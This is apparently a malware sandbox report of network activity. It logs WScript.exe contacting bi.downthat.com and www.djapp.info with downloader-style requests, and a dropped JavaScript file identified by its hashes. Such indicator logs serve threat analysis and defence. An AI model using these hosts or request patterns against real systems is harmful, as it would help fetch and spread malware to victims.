    GET https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8PZ6cjwQfSFJGxnYodZemIDVUCUxZCbPi6AaTzTMqEjT0Dy1ZzsRdJwPC-a2Gb10sCa-jfoRAmtseQuSr9hnalRBqmK0P9-YXbb3Psqt8pXyE8Zw4_qIgTX7-KNhAU_41DdkKMx1MsYFXKwc5qY99-CvoW2NES06IfoyJJm4Tv08HSYiG%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D4c04917e5fbc1b2cebd5f7453f246663&TIME=20240508T112332Z&CID=530628298&EID=&tids=15000&adUnitId=11730597&localId=w:F93159F4-8ABC-3E2B-DF73-50B998F17BEB&deviceId=6825829378917981&muid=F93159F48ABC3E2BDF7350B998F17BEB

    HTTP Response

    204
  • 88.221.83.184:443
    https://www.bing.com/aes/c.gif?RG=16c3a93125b949fd8d962a034bccd1ce&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240508T112332Z&adUnitId=11730597&localId=w:F93159F4-8ABC-3E2B-DF73-50B998F17BEB&deviceId=6825829378917981
    tls, http2
    1.4kB
    5.3kB
    16
    10

    HTTP Request

    GET https://www.bing.com/aes/c.gif?RG=16c3a93125b949fd8d962a034bccd1ce&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240508T112332Z&adUnitId=11730597&localId=w:F93159F4-8ABC-3E2B-DF73-50B998F17BEB&deviceId=6825829378917981

    HTTP Response

    200
  • 88.221.83.184:443
    https://www.bing.com/th?id=OADD2.10239359720591_10PHTLBML42K6TRZO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90
    tls, http2
    1.6kB
    6.4kB
    16
    12

    HTTP Request

    GET https://www.bing.com/th?id=OADD2.10239359720591_10PHTLBML42K6TRZO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90

    HTTP Response

    200
  • 3.130.253.23:80
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    http
    WScript.exe
    691 B
    283 B
    6
    3

    HTTP Request

    GET http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=

    HTTP Response

    302
  • 3.130.253.23:80
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    http
    WScript.exe
    691 B
    283 B
    6
    3

    HTTP Request

    GET http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=

    HTTP Response

    302
  • 3.130.253.23:80
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    http
    WScript.exe
    691 B
    283 B
    6
    3

    HTTP Request

    GET http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=

    HTTP Response

    302
  • 3.130.253.23:80
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    http
    WScript.exe
    691 B
    283 B
    6
    3

    HTTP Request

    GET http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=

    HTTP Response

    302
  • 204.79.197.200:443
    https://tse1.mm.bing.net/th?id=OADD2.10239360931609_1JAA48IJSET6WWQHH&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
    tls, http2
    30.5kB
    883.0kB
    645
    641

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239360931610_110BPTPDN41GIXK2B&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239360931609_1JAA48IJSET6WWQHH&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

    HTTP Response

    200

    HTTP Response

    200
  • 204.79.197.200:443
    tse1.mm.bing.net
    tls, http2
    1.2kB
    8.1kB
    16
    13
  • 8.8.8.8:53
    8.8.8.8.in-addr.arpa
    dns
    66 B
    90 B
    1
    1

    DNS Request

    8.8.8.8.in-addr.arpa

  • 8.8.8.8:53
    www.djapp.info
    dns
    WScript.exe
    60 B
    139 B
    1
    1

    DNS Request

    www.djapp.info

  • 8.8.8.8:53
    bi.downthat.com
    dns
    WScript.exe
    61 B
    191 B
    1
    1

    DNS Request

    bi.downthat.com

    DNS Response

    3.130.253.23
    3.130.204.160

  • 8.8.8.8:53
    www.hugedomains.com
    dns
    WScript.exe
    65 B
    113 B
    1
    1

    DNS Request

    www.hugedomains.com

    DNS Response

    172.67.70.191
    104.26.7.37
    104.26.6.37

  • 8.8.8.8:53
    228.249.119.40.in-addr.arpa
    dns
    73 B
    159 B
    1
    1

    DNS Request

    228.249.119.40.in-addr.arpa

  • 8.8.8.8:53
    23.253.130.3.in-addr.arpa
    dns
    71 B
    133 B
    1
    1

    DNS Request

    23.253.130.3.in-addr.arpa

  • 8.8.8.8:53
    g.bing.com
    dns
    56 B
    151 B
    1
    1

    DNS Request

    g.bing.com

    DNS Response

    204.79.197.237
    13.107.21.237

  • 8.8.8.8:53
    172.210.232.199.in-addr.arpa
    dns
    74 B
    128 B
    1
    1

    DNS Request

    172.210.232.199.in-addr.arpa

  • 8.8.8.8:53
    72.32.126.40.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    72.32.126.40.in-addr.arpa

  • 8.8.8.8:53
    237.197.79.204.in-addr.arpa
    dns
    73 B
    143 B
    1
    1

    DNS Request

    237.197.79.204.in-addr.arpa

  • 8.8.8.8:53
    184.83.221.88.in-addr.arpa
    dns
    72 B
    137 B
    1
    1

    DNS Request

    184.83.221.88.in-addr.arpa

  • 8.8.8.8:53
    43.58.199.20.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    43.58.199.20.in-addr.arpa

  • 8.8.8.8:53
    13.86.106.20.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    13.86.106.20.in-addr.arpa

  • 8.8.8.8:53
    www.djapp.info
    dns
    WScript.exe
    120 B
    278 B
    2
    2

    DNS Request

    www.djapp.info

    DNS Request

    www.djapp.info

  • 8.8.8.8:53
    www.djapp.info
    dns
    WScript.exe
    60 B
    139 B
    1
    1

    DNS Request

    www.djapp.info

  • 8.8.8.8:53
    86.23.85.13.in-addr.arpa
    dns
    70 B
    144 B
    1
    1

    DNS Request

    86.23.85.13.in-addr.arpa

  • 8.8.8.8:53
    206.23.85.13.in-addr.arpa
    dns
    71 B
    145 B
    1
    1

    DNS Request

    206.23.85.13.in-addr.arpa

  • 8.8.8.8:53
    www.djapp.info
    dns
    WScript.exe
    60 B
    139 B
    1
    1

    DNS Request

    www.djapp.info

  • 8.8.8.8:53
    www.djapp.info
    dns
    WScript.exe
    60 B
    139 B
    1
    1

    DNS Request

    www.djapp.info

  • 8.8.8.8:53
    240.197.17.2.in-addr.arpa
    dns
    71 B
    135 B
    1
    1

    DNS Request

    240.197.17.2.in-addr.arpa

  • 8.8.8.8:53
    249.197.17.2.in-addr.arpa
    dns
    71 B
    135 B
    1
    1

    DNS Request

    249.197.17.2.in-addr.arpa

  • 8.8.8.8:53
    29.243.111.52.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    29.243.111.52.in-addr.arpa

  • 8.8.8.8:53
    tse1.mm.bing.net
    dns
    62 B
    173 B
    1
    1

    DNS Request

    tse1.mm.bing.net

    DNS Response

    204.79.197.200
    13.107.21.200

  • 8.8.8.8:53
    200.197.79.204.in-addr.arpa
    dns
    73 B
    106 B
    1
    1

    DNS Request

    200.197.79.204.in-addr.arpa

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\fuf4314.js

    Filesize

    3KB

    MD5

    3813cab188d1de6f92f8b82c2059991b

    SHA1

    4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

    SHA256

    a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

    SHA512

    83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.